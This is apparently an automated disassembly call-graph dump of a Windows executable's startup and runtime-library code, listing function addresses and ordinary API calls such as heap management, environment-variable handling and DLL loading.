7ff79f639c73 14758->14759 14762 7ff79f639ce4 14759->14762 14761 7ff79f639c9a 14770 7ff79f639a2c 14762->14770 14767 7ff79f639d1f 14767->14761 14768 7ff79f639dd0 _wfindfirst32i64 17 API calls 14769 7ff79f639daf 14768->14769 14771 7ff79f639a48 GetLastError 14770->14771 14772 7ff79f639a83 14770->14772 14773 7ff79f639a58 14771->14773 14772->14767 14776 7ff79f639a98 14772->14776 14779 7ff79f63a860 14773->14779 14777 7ff79f639acc 14776->14777 14778 7ff79f639ab4 GetLastError SetLastError 14776->14778 14777->14767 14777->14768 14778->14777 14780 7ff79f63a89a FlsSetValue 14779->14780 14781 7ff79f63a87f FlsGetValue 14779->14781 14782 7ff79f63a8a7 14780->14782 14785 7ff79f639a73 SetLastError 14780->14785 14783 7ff79f63a894 14781->14783 14781->14785 14796 7ff79f63dd40 14782->14796 14783->14780 14785->14772 14787 7ff79f63a8d4 FlsSetValue 14790 7ff79f63a8f2 14787->14790 14791 7ff79f63a8e0 FlsSetValue 14787->14791 14788 7ff79f63a8c4 FlsSetValue 14789 7ff79f63a8cd 14788->14789 14803 7ff79f639e18 14789->14803 14809 7ff79f63a3c4 14790->14809 14791->14789 14797 7ff79f63dd51 _findclose 14796->14797 14798 7ff79f63dda2 14797->14798 14799 7ff79f63dd86 HeapAlloc 14797->14799 14814 7ff79f6426b0 14797->14814 14801 7ff79f634444 _findclose 10 API calls 14798->14801 14799->14797 14800 7ff79f63a8b6 14799->14800 14800->14787 14800->14788 14801->14800 14804 7ff79f639e1d RtlFreeHeap 14803->14804 14805 7ff79f639e4c 14803->14805 14804->14805 14806 7ff79f639e38 GetLastError 14804->14806 14805->14785 14807 7ff79f639e45 Concurrency::details::SchedulerProxy::DeleteThis 14806->14807 14808 7ff79f634444 _findclose 9 API calls 14807->14808 14808->14805 14823 7ff79f63a29c 14809->14823 14817 7ff79f6426f0 14814->14817 14822 7ff79f63f788 EnterCriticalSection 14817->14822 14835 7ff79f63f788 EnterCriticalSection 14823->14835 14839 7ff79f63a7d9 FlsSetValue 14838->14839 14840 7ff79f63a7bc 14838->14840 14841 7ff79f63a7eb 14839->14841 14852 7ff79f63a7c9 14839->14852 14840->14839 14840->14852 14843 7ff79f63dd40 _findclose 5 API calls 14841->14843 14842 7ff79f63a845 SetLastError 14842->14741 14844 7ff79f63a7fa 14843->14844 14845 7ff79f63a818 FlsSetValue 14844->14845 14846 7ff79f63a808 FlsSetValue 14844->14846 14848 7ff79f63a836 14845->14848 14849 7ff79f63a824 FlsSetValue 14845->14849 14847 7ff79f63a811 14846->14847 14850 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 14847->14850 14851 7ff79f63a3c4 _findclose 5 API calls 14848->14851 14849->14847 14850->14852 14853 7ff79f63a83e 14851->14853 14852->14842 14854 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 14853->14854 14854->14842 14856 7ff79f62b04e RtlLookupFunctionEntry 14855->14856 14857 7ff79f62ae6b 14856->14857 14858 7ff79f62b064 RtlVirtualUnwind 14856->14858 14859 7ff79f62ae00 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14857->14859 14858->14856 14858->14857 14861 7ff79f639b1e _wfindfirst32i64 memcpy_s 14860->14861 14862 7ff79f639b46 RtlCaptureContext RtlLookupFunctionEntry 14861->14862 14863 7ff79f639b80 RtlVirtualUnwind 14862->14863 14864 7ff79f639bb6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14862->14864 14863->14864 14865 7ff79f639c08 _wfindfirst32i64 14864->14865 14866 7ff79f62ad80 _wfindfirst32i64 8 API calls 14865->14866 14867 7ff79f639c27 GetCurrentProcess TerminateProcess 14866->14867 17877 7ff79f649664 17880 7ff79f6342f8 LeaveCriticalSection 17877->17880 18124 7ff79f638a50 18127 7ff79f6389d0 18124->18127 18134 7ff79f63f788 EnterCriticalSection 18127->18134 19073 7ff79f62b0b0 19074 7ff79f62b0c0 19073->19074 19090 7ff79f63579c 19074->19090 19076 7ff79f62b0cc 19096 7ff79f62b3b8 19076->19096 19078 7ff79f62b69c 7 API calls 19079 7ff79f62b165 19078->19079 19080 7ff79f62b0e4 _RTC_Initialize 19088 7ff79f62b139 19080->19088 19101 7ff79f62b568 19080->19101 19082 7ff79f62b0f9 19104 7ff79f637e6c 19082->19104 19088->19078 19089 7ff79f62b155 19088->19089 19091 7ff79f6357ad 19090->19091 19092 7ff79f6357b5 19091->19092 19093 7ff79f634444 _findclose 11 API calls 19091->19093 19092->19076 19094 7ff79f6357c4 19093->19094 19095 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 19094->19095 19095->19092 19097 7ff79f62b3c9 19096->19097 19100 7ff79f62b3ce __scrt_acquire_startup_lock 19096->19100 19098 7ff79f62b69c 7 API calls 19097->19098 19097->19100 19099 7ff79f62b442 19098->19099 19100->19080 19129 7ff79f62b52c 19101->19129 19103 7ff79f62b571 19103->19082 19105 7ff79f62b105 19104->19105 19106 7ff79f637e8c 19104->19106 19105->19088 19128 7ff79f62b63c InitializeSListHead 19105->19128 19107 7ff79f637eaa GetModuleFileNameW 19106->19107 19108 7ff79f637e94 19106->19108 19112 7ff79f637ed5 19107->19112 19109 7ff79f634444 _findclose 11 API calls 19108->19109 19110 7ff79f637e99 19109->19110 19111 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 19110->19111 19111->19105 19144 7ff79f637e0c 19112->19144 19115 7ff79f637f1d 19116 7ff79f634444 _findclose 11 API calls 19115->19116 19117 7ff79f637f22 19116->19117 19118 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19117->19118 19118->19105 19119 7ff79f637f57 19121 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19119->19121 19120 7ff79f637f35 19120->19119 19122 7ff79f637f9c 19120->19122 19123 7ff79f637f83 19120->19123 19121->19105 19125 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19122->19125 19124 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19123->19124 19126 7ff79f637f8c 19124->19126 19125->19119 19127 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19126->19127 19127->19105 19130 7ff79f62b546 19129->19130 19132 7ff79f62b53f 19129->19132 19133 7ff79f638eec 19130->19133 19132->19103 19136 7ff79f638b28 19133->19136 19143 7ff79f63f788 EnterCriticalSection 19136->19143 19145 7ff79f637e5c 19144->19145 19146 7ff79f637e24 19144->19146 19145->19115 19145->19120 19146->19145 19147 7ff79f63dd40 _findclose 11 API calls 19146->19147 19148 7ff79f637e52 19147->19148 19149 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19148->19149 19149->19145 14868 7ff79f62b19c 14889 7ff79f62b36c 14868->14889 14871 7ff79f62b2e8 14991 7ff79f62b69c IsProcessorFeaturePresent 14871->14991 14872 7ff79f62b1b8 __scrt_acquire_startup_lock 14874 7ff79f62b2f2 14872->14874 14881 7ff79f62b1d6 __scrt_release_startup_lock 14872->14881 14875 7ff79f62b69c 7 API calls 14874->14875 14877 7ff79f62b2fd _CreateFrameInfo 14875->14877 14876 7ff79f62b1fb 14878 7ff79f62b281 14895 7ff79f62b7e8 14878->14895 14880 7ff79f62b286 14898 7ff79f621000 14880->14898 14881->14876 14881->14878 14980 7ff79f638984 14881->14980 14886 7ff79f62b2a9 14886->14877 14987 7ff79f62b500 14886->14987 14998 7ff79f62b96c 14889->14998 14892 7ff79f62b1b0 14892->14871 14892->14872 14893 7ff79f62b39b __scrt_initialize_crt 14893->14892 15000 7ff79f62cac8 14893->15000 15027 7ff79f62c210 14895->15027 14897 7ff79f62b7ff GetStartupInfoW 14897->14880 14899 7ff79f62100b 14898->14899 15029 7ff79f627600 14899->15029 14901 7ff79f62101d 15036 7ff79f634f14 14901->15036 14903 7ff79f62367b 15043 7ff79f621af0 14903->15043 14907 7ff79f62ad80 _wfindfirst32i64 8 API calls 14908 7ff79f6237ae 14907->14908 14985 7ff79f62b82c GetModuleHandleW 14908->14985 14909 7ff79f623699 14972 7ff79f62379a 14909->14972 15059 7ff79f623b20 14909->15059 14911 7ff79f6236cb 14911->14972 15062 7ff79f626990 14911->15062 14913 7ff79f6236e7 14914 7ff79f623733 14913->14914 14915 7ff79f626990 61 API calls 14913->14915 15077 7ff79f626f90 14914->15077 14921 7ff79f623708 __std_exception_destroy 14915->14921 14917 7ff79f623748 15081 7ff79f6219d0 14917->15081 14920 7ff79f62383d 14923 7ff79f623868 14920->14923 15186 7ff79f623280 14920->15186 14921->14914 14926 7ff79f626f90 58 API calls 14921->14926 14922 7ff79f6219d0 121 API calls 14925 7ff79f62377e 14922->14925 14934 7ff79f6238ab 14923->14934 15092 7ff79f627a30 14923->15092 14929 7ff79f6237c0 14925->14929 14930 7ff79f623782 14925->14930 14926->14914 14928 7ff79f623888 14931 7ff79f62389e SetDllDirectoryW 14928->14931 14932 7ff79f62388d 14928->14932 14929->14920 15163 7ff79f623cb0 14929->15163 15150 7ff79f622770 14930->15150 14931->14934 14935 7ff79f622770 59 API calls 14932->14935 15106 7ff79f625e40 14934->15106 14935->14972 14940 7ff79f6237e2 14945 7ff79f622770 59 API calls 14940->14945 14941 7ff79f623906 14948 7ff79f6239c6 14941->14948 14956 7ff79f623919 14941->14956 14944 7ff79f623810 14944->14920 14947 7ff79f623815 14944->14947 14945->14972 14946 7ff79f6238c8 14946->14941 15200 7ff79f625640 14946->15200 15182 7ff79f62f2ac 14947->15182 15110 7ff79f623110 14948->15110 14954 7ff79f6238fc 15294 7ff79f625890 14954->15294 14955 7ff79f6238dd 15220 7ff79f6255d0 14955->15220 14961 7ff79f623965 14956->14961 15300 7ff79f621b30 14956->15300 14961->14972 15304 7ff79f6230b0 14961->15304 14962 7ff79f6238e7 14962->14954 14964 7ff79f6238eb 14962->14964 14963 7ff79f6239fb 14965 7ff79f626990 61 API calls 14963->14965 15288 7ff79f625c90 14964->15288 14970 7ff79f623a07 14965->14970 14968 7ff79f6239a1 14971 7ff79f625890 FreeLibrary 14968->14971 14970->14972 15127 7ff79f626fd0 14970->15127 14971->14972 14972->14907 14981 7ff79f6389bc 14980->14981 14982 7ff79f63899b 14980->14982 17688 7ff79f6390d8 14981->17688 14982->14878 14986 7ff79f62b83d 14985->14986 14986->14886 14989 7ff79f62b511 14987->14989 14988 7ff79f62b2c0 14988->14876 14989->14988 14990 7ff79f62cac8 __scrt_initialize_crt 7 API calls 14989->14990 14990->14988 14992 7ff79f62b6c2 _wfindfirst32i64 memcpy_s 14991->14992 14993 7ff79f62b6e1 RtlCaptureContext RtlLookupFunctionEntry 14992->14993 14994 7ff79f62b70a RtlVirtualUnwind 14993->14994 14995 7ff79f62b746 memcpy_s 14993->14995 14994->14995 14996 7ff79f62b778 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14995->14996 14997 7ff79f62b7ca _wfindfirst32i64 14996->14997 14997->14874 14999 7ff79f62b38e __scrt_dllmain_crt_thread_attach 14998->14999 14999->14892 14999->14893 15001 7ff79f62cada 15000->15001 15002 7ff79f62cad0 15000->15002 15001->14892 15006 7ff79f62ce44 15002->15006 15007 7ff79f62ce53 15006->15007 15009 7ff79f62cad5 15006->15009 15014 7ff79f62d080 15007->15014 15010 7ff79f62ceb0 15009->15010 15011 7ff79f62cedb 15010->15011 15012 7ff79f62cebe DeleteCriticalSection 15011->15012 15013 7ff79f62cedf 15011->15013 15012->15011 15013->15001 15018 7ff79f62cee8 15014->15018 15019 7ff79f62d002 TlsFree 15018->15019 15025 7ff79f62cf2c __vcrt_InitializeCriticalSectionEx 15018->15025 15020 7ff79f62cf5a LoadLibraryExW 15022 7ff79f62cf7b GetLastError 15020->15022 15023 7ff79f62cfd1 15020->15023 15021 7ff79f62cff1 GetProcAddress 15021->15019 15022->15025 15023->15021 15024 7ff79f62cfe8 FreeLibrary 15023->15024 15024->15021 15025->15019 15025->15020 15025->15021 15026 7ff79f62cf9d LoadLibraryExW 15025->15026 15026->15023 15026->15025 15028 7ff79f62c1f0 15027->15028 15028->14897 15028->15028 15030 7ff79f62761f 15029->15030 15031 7ff79f627627 __std_exception_destroy 15030->15031 15032 7ff79f627670 WideCharToMultiByte 15030->15032 15034 7ff79f627718 15030->15034 15035 7ff79f6276c6 WideCharToMultiByte 15030->15035 15031->14901 15032->15030 15032->15034 15359 7ff79f622620 15034->15359 15035->15030 15035->15034 15038 7ff79f63ec40 15036->15038 15037 7ff79f63ec93 15039 7ff79f639ce4 _invalid_parameter_noinfo 37 API calls 15037->15039 15038->15037 15040 7ff79f63ece6 15038->15040 15041 7ff79f63ecbc 15039->15041 15756 7ff79f63eb18 15040->15756 15041->14903 15044 7ff79f621b05 15043->15044 15045 7ff79f621b20 15044->15045 15764 7ff79f6224d0 15044->15764 15045->14972 15047 7ff79f623ba0 15045->15047 15048 7ff79f62adb0 15047->15048 15049 7ff79f623bac GetModuleFileNameW 15048->15049 15050 7ff79f623bdb 15049->15050 15051 7ff79f623bf2 15049->15051 15052 7ff79f622620 57 API calls 15050->15052 15804 7ff79f627b40 15051->15804 15054 7ff79f623bee 15052->15054 15057 7ff79f62ad80 _wfindfirst32i64 8 API calls 15054->15057 15056 7ff79f622770 59 API calls 15056->15054 15058 7ff79f623c2f 15057->15058 15058->14909 15060 7ff79f621b30 49 API calls 15059->15060 15061 7ff79f623b3d 15060->15061 15061->14911 15063 7ff79f62699a 15062->15063 15064 7ff79f627a30 57 API calls 15063->15064 15065 7ff79f6269bc GetEnvironmentVariableW 15064->15065 15066 7ff79f6269d4 ExpandEnvironmentStringsW 15065->15066 15067 7ff79f626a26 15065->15067 15069 7ff79f627b40 59 API calls 15066->15069 15068 7ff79f62ad80 _wfindfirst32i64 8 API calls 15067->15068 15070 7ff79f626a38 15068->15070 15071 7ff79f6269fc 15069->15071 15070->14913 15071->15067 15072 7ff79f626a06 15071->15072 15815 7ff79f63910c 15072->15815 15075 7ff79f62ad80 _wfindfirst32i64 8 API calls 15076 7ff79f626a1e 15075->15076 15076->14913 15078 7ff79f627a30 57 API calls 15077->15078 15079 7ff79f626fa7 SetEnvironmentVariableW 15078->15079 15080 7ff79f626fbf __std_exception_destroy 15079->15080 15080->14917 15082 7ff79f621b30 49 API calls 15081->15082 15083 7ff79f621a00 15082->15083 15084 7ff79f621b30 49 API calls 15083->15084 15091 7ff79f621a7a 15083->15091 15085 7ff79f621a22 15084->15085 15086 7ff79f623b20 49 API calls 15085->15086 15085->15091 15087 7ff79f621a3b 15086->15087 15822 7ff79f6217b0 15087->15822 15090 7ff79f62f2ac 74 API calls 15090->15091 15091->14920 15091->14922 15093 7ff79f627ad7 MultiByteToWideChar 15092->15093 15094 7ff79f627a51 MultiByteToWideChar 15092->15094 15095 7ff79f627afa 15093->15095 15096 7ff79f627b1f 15093->15096 15097 7ff79f627a77 15094->15097 15100 7ff79f627a9c 15094->15100 15098 7ff79f622620 55 API calls 15095->15098 15096->14928 15099 7ff79f622620 55 API calls 15097->15099 15101 7ff79f627b0d 15098->15101 15102 7ff79f627a8a 15099->15102 15100->15093 15103 7ff79f627ab2 15100->15103 15101->14928 15102->14928 15104 7ff79f622620 55 API calls 15103->15104 15105 7ff79f627ac5 15104->15105 15105->14928 15107 7ff79f625e55 15106->15107 15108 7ff79f6238b0 15107->15108 15109 7ff79f6224d0 59 API calls 15107->15109 15108->14941 15190 7ff79f625ae0 15108->15190 15109->15108 15116 7ff79f623183 15110->15116 15119 7ff79f6231c4 15110->15119 15111 7ff79f623203 15113 7ff79f62ad80 _wfindfirst32i64 8 API calls 15111->15113 15112 7ff79f621ab0 74 API calls 15112->15119 15114 7ff79f623215 15113->15114 15114->14972 15120 7ff79f626f20 15114->15120 15116->15119 15895 7ff79f621440 15116->15895 15929 7ff79f622990 15116->15929 15984 7ff79f621780 15116->15984 15119->15111 15119->15112 15121 7ff79f627a30 57 API calls 15120->15121 15122 7ff79f626f3f 15121->15122 15123 7ff79f627a30 57 API calls 15122->15123 15124 7ff79f626f4f 15123->15124 15125 7ff79f6366b4 38 API calls 15124->15125 15126 7ff79f626f5d __std_exception_destroy 15125->15126 15126->14963 15128 7ff79f626fe0 15127->15128 15129 7ff79f627a30 57 API calls 15128->15129 15130 7ff79f627011 SetConsoleCtrlHandler GetStartupInfoW 15129->15130 15131 7ff79f627072 15130->15131 16860 7ff79f639184 15131->16860 15151 7ff79f622790 15150->15151 15152 7ff79f633be4 49 API calls 15151->15152 15153 7ff79f6227dd memcpy_s 15152->15153 15154 7ff79f627a30 57 API calls 15153->15154 15155 7ff79f62280a 15154->15155 15156 7ff79f622849 MessageBoxA 15155->15156 15157 7ff79f62280f 15155->15157 15159 7ff79f622863 15156->15159 15158 7ff79f627a30 57 API calls 15157->15158 15160 7ff79f622829 MessageBoxW 15158->15160 15161 7ff79f62ad80 _wfindfirst32i64 8 API calls 15159->15161 15160->15159 15162 7ff79f622873 15161->15162 15162->14972 15164 7ff79f623cbc 15163->15164 15165 7ff79f627a30 57 API calls 15164->15165 15166 7ff79f623ce7 15165->15166 15167 7ff79f627a30 57 API calls 15166->15167 15168 7ff79f623cfa 15167->15168 16878 7ff79f6354c8 15168->16878 15171 7ff79f62ad80 _wfindfirst32i64 8 API calls 15172 7ff79f6237da 15171->15172 15172->14940 15173 7ff79f627200 15172->15173 15174 7ff79f627224 15173->15174 15175 7ff79f62f934 73 API calls 15174->15175 15176 7ff79f6272fb __std_exception_destroy 15174->15176 15177 7ff79f62723e 15175->15177 15176->14944 15177->15176 17257 7ff79f637938 15177->17257 15179 7ff79f62f934 73 API calls 15181 7ff79f627253 15179->15181 15180 7ff79f62f5fc _fread_nolock 53 API calls 15180->15181 15181->15176 15181->15179 15181->15180 15183 7ff79f62f2dc 15182->15183 17272 7ff79f62f088 15183->17272 15185 7ff79f62f2f5 15185->14940 15187 7ff79f623297 15186->15187 15188 7ff79f6232c0 15186->15188 15187->15188 15189 7ff79f621780 59 API calls 15187->15189 15188->14923 15189->15187 15191 7ff79f625b04 15190->15191 15195 7ff79f625b31 15190->15195 15192 7ff79f625b2c 15191->15192 15193 7ff79f621780 59 API calls 15191->15193 15191->15195 15199 7ff79f625b27 memcpy_s __std_exception_destroy 15191->15199 17283 7ff79f6212b0 15192->17283 15193->15191 15195->15199 17309 7ff79f623d30 15195->17309 15197 7ff79f625b97 15198 7ff79f622770 59 API calls 15197->15198 15197->15199 15198->15199 15199->14946 15214 7ff79f62565a memcpy_s 15200->15214 15202 7ff79f62577f 15204 7ff79f623d30 49 API calls 15202->15204 15203 7ff79f62579b 15205 7ff79f622770 59 API calls 15203->15205 15206 7ff79f6257f8 15204->15206 15212 7ff79f625791 __std_exception_destroy 15205->15212 15209 7ff79f623d30 49 API calls 15206->15209 15207 7ff79f623d30 49 API calls 15207->15214 15208 7ff79f625760 15208->15202 15210 7ff79f623d30 49 API calls 15208->15210 15211 7ff79f625828 15209->15211 15210->15202 15216 7ff79f623d30 49 API calls 15211->15216 15213 7ff79f62ad80 _wfindfirst32i64 8 API calls 15212->15213 15215 7ff79f6238d9 15213->15215 15214->15202 15214->15203 15214->15207 15214->15208 15217 7ff79f621440 161 API calls 15214->15217 15218 7ff79f625781 15214->15218 17312 7ff79f621650 15214->17312 15215->14954 15215->14955 15216->15212 15217->15214 15219 7ff79f622770 59 API calls 15218->15219 15219->15212 17317 7ff79f6271b0 15220->17317 15222 7ff79f6255e2 15223 7ff79f6271b0 58 API calls 15222->15223 15224 7ff79f6255f5 15223->15224 15225 7ff79f62561a 15224->15225 15226 7ff79f62560d GetProcAddress 15224->15226 15227 7ff79f622770 59 API calls 15225->15227 15230 7ff79f625f79 15226->15230 15231 7ff79f625f9c GetProcAddress 15226->15231 15229 7ff79f625626 15227->15229 15229->14962 15234 7ff79f622620 57 API calls 15230->15234 15231->15230 15232 7ff79f625fc1 GetProcAddress 15231->15232 15232->15230 15233 7ff79f625fe6 GetProcAddress 15232->15233 15233->15230 15235 7ff79f62600e GetProcAddress 15233->15235 15236 7ff79f625f8c 15234->15236 15235->15230 15237 7ff79f626036 GetProcAddress 15235->15237 15236->14962 15237->15230 15238 7ff79f62605e GetProcAddress 15237->15238 15289 7ff79f625cb4 15288->15289 15295 7ff79f6258a2 15294->15295 15296 7ff79f6258bd 15294->15296 15295->15296 15297 7ff79f625980 15295->15297 17321 7ff79f627190 FreeLibrary 15295->17321 15296->14941 15297->15296 17322 7ff79f627190 FreeLibrary 15297->17322 15301 7ff79f621b55 15300->15301 15302 7ff79f633be4 49 API calls 15301->15302 15303 7ff79f621b78 15302->15303 15303->14961 17323 7ff79f624960 15304->17323 15307 7ff79f6230fd 15307->14968 15309 7ff79f6230d4 15309->15307 17379 7ff79f6246e0 15309->17379 15378 7ff79f62adb0 15359->15378 15362 7ff79f622669 15380 7ff79f633be4 15362->15380 15367 7ff79f621b30 49 API calls 15368 7ff79f6226c8 memcpy_s 15367->15368 15369 7ff79f627a30 54 API calls 15368->15369 15370 7ff79f6226f5 15369->15370 15371 7ff79f6226fa 15370->15371 15372 7ff79f622734 MessageBoxA 15370->15372 15373 7ff79f627a30 54 API calls 15371->15373 15374 7ff79f62274e 15372->15374 15375 7ff79f622714 MessageBoxW 15373->15375 15376 7ff79f62ad80 _wfindfirst32i64 8 API calls 15374->15376 15375->15374 15377 7ff79f62275e 15376->15377 15377->15031 15379 7ff79f62263c GetLastError 15378->15379 15379->15362 15381 7ff79f633c3e 15380->15381 15382 7ff79f633c63 15381->15382 15383 7ff79f633c9f 15381->15383 15384 7ff79f639ce4 _invalid_parameter_noinfo 37 API calls 15382->15384 15410 7ff79f631e70 15383->15410 15386 7ff79f633c8d 15384->15386 15388 7ff79f62ad80 _wfindfirst32i64 8 API calls 15386->15388 15387 7ff79f633d7c 15389 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15387->15389 15391 7ff79f622699 15388->15391 15389->15386 15398 7ff79f6274b0 15391->15398 15392 7ff79f633d51 15395 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15392->15395 15393 7ff79f633da0 15393->15387 15394 7ff79f633daa 15393->15394 15397 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15394->15397 15395->15386 15396 7ff79f633d48 15396->15387 15396->15392 15397->15386 15399 7ff79f6274bc 15398->15399 15400 7ff79f6274d7 GetLastError 15399->15400 15401 7ff79f6274dd FormatMessageW 15399->15401 15400->15401 15402 7ff79f62752c WideCharToMultiByte 15401->15402 15403 7ff79f627510 15401->15403 15405 7ff79f627523 15402->15405 15406 7ff79f627566 15402->15406 15404 7ff79f622620 54 API calls 15403->15404 15404->15405 15408 7ff79f62ad80 _wfindfirst32i64 8 API calls 15405->15408 15407 7ff79f622620 54 API calls 15406->15407 15407->15405 15409 7ff79f6226a0 15408->15409 15409->15367 15411 7ff79f631eae 15410->15411 15416 7ff79f631e9e 15410->15416 15412 7ff79f631eb7 15411->15412 15420 7ff79f631ee5 15411->15420 15415 7ff79f639ce4 _invalid_parameter_noinfo 37 API calls 15412->15415 15413 7ff79f631edd 15413->15387 15413->15392 15413->15393 15413->15396 15414 7ff79f639ce4 _invalid_parameter_noinfo 37 API calls 15414->15413 15415->15413 15416->15414 15419 7ff79f632194 15422 7ff79f639ce4 _invalid_parameter_noinfo 37 API calls 15419->15422 15420->15413 15420->15416 15420->15419 15424 7ff79f632800 15420->15424 15450 7ff79f6324c8 15420->15450 15480 7ff79f631d50 15420->15480 15483 7ff79f633a20 15420->15483 15422->15416 15425 7ff79f632842 15424->15425 15426 7ff79f6328b5 15424->15426 15427 7ff79f632848 15425->15427 15428 7ff79f6328df 15425->15428 15429 7ff79f6328ba 15426->15429 15430 7ff79f63290f 15426->15430 15436 7ff79f63284d 15427->15436 15439 7ff79f63291e 15427->15439 15507 7ff79f630db0 15428->15507 15431 7ff79f6328bc 15429->15431 15432 7ff79f6328ef 15429->15432 15430->15428 15430->15439 15449 7ff79f632878 15430->15449 15433 7ff79f63285d 15431->15433 15438 7ff79f6328cb 15431->15438 15514 7ff79f6309a0 15432->15514 15447 7ff79f63294d 15433->15447 15489 7ff79f633164 15433->15489 15436->15433 15440 7ff79f632890 15436->15440 15436->15449 15438->15428 15442 7ff79f6328d0 15438->15442 15439->15447 15521 7ff79f6311c0 15439->15521 15440->15447 15499 7ff79f633620 15440->15499 15442->15447 15503 7ff79f6337b8 15442->15503 15444 7ff79f62ad80 _wfindfirst32i64 8 API calls 15446 7ff79f632be3 15444->15446 15446->15420 15447->15444 15449->15447 15528 7ff79f63da00 15449->15528 15451 7ff79f6324e9 15450->15451 15452 7ff79f6324d3 15450->15452 15453 7ff79f639ce4 _invalid_parameter_noinfo 37 API calls 15451->15453 15454 7ff79f632527 15451->15454 15452->15454 15455 7ff79f632842 15452->15455 15456 7ff79f6328b5 15452->15456 15453->15454 15454->15420 15457 7ff79f632848 15455->15457 15458 7ff79f6328df 15455->15458 15459 7ff79f6328ba 15456->15459 15460 7ff79f63290f 15456->15460 15466 7ff79f63284d 15457->15466 15468 7ff79f63291e 15457->15468 15464 7ff79f630db0 38 API calls 15458->15464 15461 7ff79f6328bc 15459->15461 15462 7ff79f6328ef 15459->15462 15460->15458 15460->15468 15477 7ff79f632878 15460->15477 15463 7ff79f63285d 15461->15463 15471 7ff79f6328cb 15461->15471 15467 7ff79f6309a0 38 API calls 15462->15467 15465 7ff79f633164 47 API calls 15463->15465 15479 7ff79f63294d 15463->15479 15464->15477 15465->15477 15466->15463 15469 7ff79f632890 15466->15469 15466->15477 15467->15477 15470 7ff79f6311c0 38 API calls 15468->15470 15468->15479 15472 7ff79f633620 47 API calls 15469->15472 15469->15479 15470->15477 15471->15458 15473 7ff79f6328d0 15471->15473 15472->15477 15475 7ff79f6337b8 37 API calls 15473->15475 15473->15479 15474 7ff79f62ad80 _wfindfirst32i64 8 API calls 15476 7ff79f632be3 15474->15476 15475->15477 15476->15420 15478 7ff79f63da00 47 API calls 15477->15478 15477->15479 15478->15477 15479->15474 15684 7ff79f62ff74 15480->15684 15484 7ff79f633a37 15483->15484 15701 7ff79f63cb60 15484->15701 15490 7ff79f633186 15489->15490 15538 7ff79f62fde0 15490->15538 15495 7ff79f63334c 15495->15449 15496 7ff79f633a20 45 API calls 15498 7ff79f6332c3 15496->15498 15497 7ff79f633a20 45 API calls 15497->15495 15498->15495 15498->15497 15498->15498 15500 7ff79f633638 15499->15500 15502 7ff79f6336a0 15499->15502 15501 7ff79f63da00 47 API calls 15500->15501 15500->15502 15501->15502 15502->15449 15505 7ff79f6337d9 15503->15505 15504 7ff79f639ce4 _invalid_parameter_noinfo 37 API calls 15506 7ff79f63380a 15504->15506 15505->15504 15505->15506 15506->15449 15508 7ff79f630de3 15507->15508 15509 7ff79f630e12 15508->15509 15511 7ff79f630ecf 15508->15511 15510 7ff79f62fde0 12 API calls 15509->15510 15513 7ff79f630e4f 15509->15513 15510->15513 15512 7ff79f639ce4 _invalid_parameter_noinfo 37 API calls 15511->15512 15512->15513 15513->15449 15515 7ff79f6309d3 15514->15515 15516 7ff79f630a02 15515->15516 15518 7ff79f630abf 15515->15518 15517 7ff79f62fde0 12 API calls 15516->15517 15520 7ff79f630a3f 15516->15520 15517->15520 15519 7ff79f639ce4 _invalid_parameter_noinfo 37 API calls 15518->15519 15519->15520 15520->15449 15522 7ff79f6311f3 15521->15522 15523 7ff79f631222 15522->15523 15525 7ff79f6312df 15522->15525 15524 7ff79f62fde0 12 API calls 15523->15524 15527 7ff79f63125f 15523->15527 15524->15527 15526 7ff79f639ce4 _invalid_parameter_noinfo 37 API calls 15525->15526 15526->15527 15527->15449 15529 7ff79f63da28 15528->15529 15530 7ff79f63da6d 15529->15530 15531 7ff79f633a20 45 API calls 15529->15531 15532 7ff79f63da2d memcpy_s 15529->15532 15534 7ff79f63da56 memcpy_s 15529->15534 15530->15532 15530->15534 15681 7ff79f63f0b8 15530->15681 15531->15530 15532->15449 15533 7ff79f639ce4 _invalid_parameter_noinfo 37 API calls 15533->15532 15534->15532 15534->15533 15539 7ff79f62fe17 15538->15539 15545 7ff79f62fe06 15538->15545 15539->15545 15568 7ff79f63cacc 15539->15568 15542 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15544 7ff79f62fe58 15542->15544 15543 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15543->15545 15544->15543 15546 7ff79f63d718 15545->15546 15547 7ff79f63d768 15546->15547 15548 7ff79f63d735 15546->15548 15547->15548 15550 7ff79f63d79a 15547->15550 15549 7ff79f639ce4 _invalid_parameter_noinfo 37 API calls 15548->15549 15559 7ff79f6332a1 15549->15559 15555 7ff79f63d8ad 15550->15555 15561 7ff79f63d7e2 15550->15561 15551 7ff79f63d99f 15608 7ff79f63cc04 15551->15608 15553 7ff79f63d965 15601 7ff79f63cf9c 15553->15601 15555->15551 15555->15553 15556 7ff79f63d934 15555->15556 15558 7ff79f63d8f7 15555->15558 15560 7ff79f63d8ed 15555->15560 15594 7ff79f63d27c 15556->15594 15584 7ff79f63d4ac 15558->15584 15559->15496 15559->15498 15560->15553 15563 7ff79f63d8f2 15560->15563 15561->15559 15575 7ff79f6391ac 15561->15575 15563->15556 15563->15558 15566 7ff79f639dd0 _wfindfirst32i64 17 API calls 15567 7ff79f63d9fc 15566->15567 15569 7ff79f63cb17 15568->15569 15570 7ff79f63cadb _findclose 15568->15570 15571 7ff79f634444 _findclose 11 API calls 15569->15571 15570->15569 15572 7ff79f63cafe HeapAlloc 15570->15572 15574 7ff79f6426b0 _findclose 2 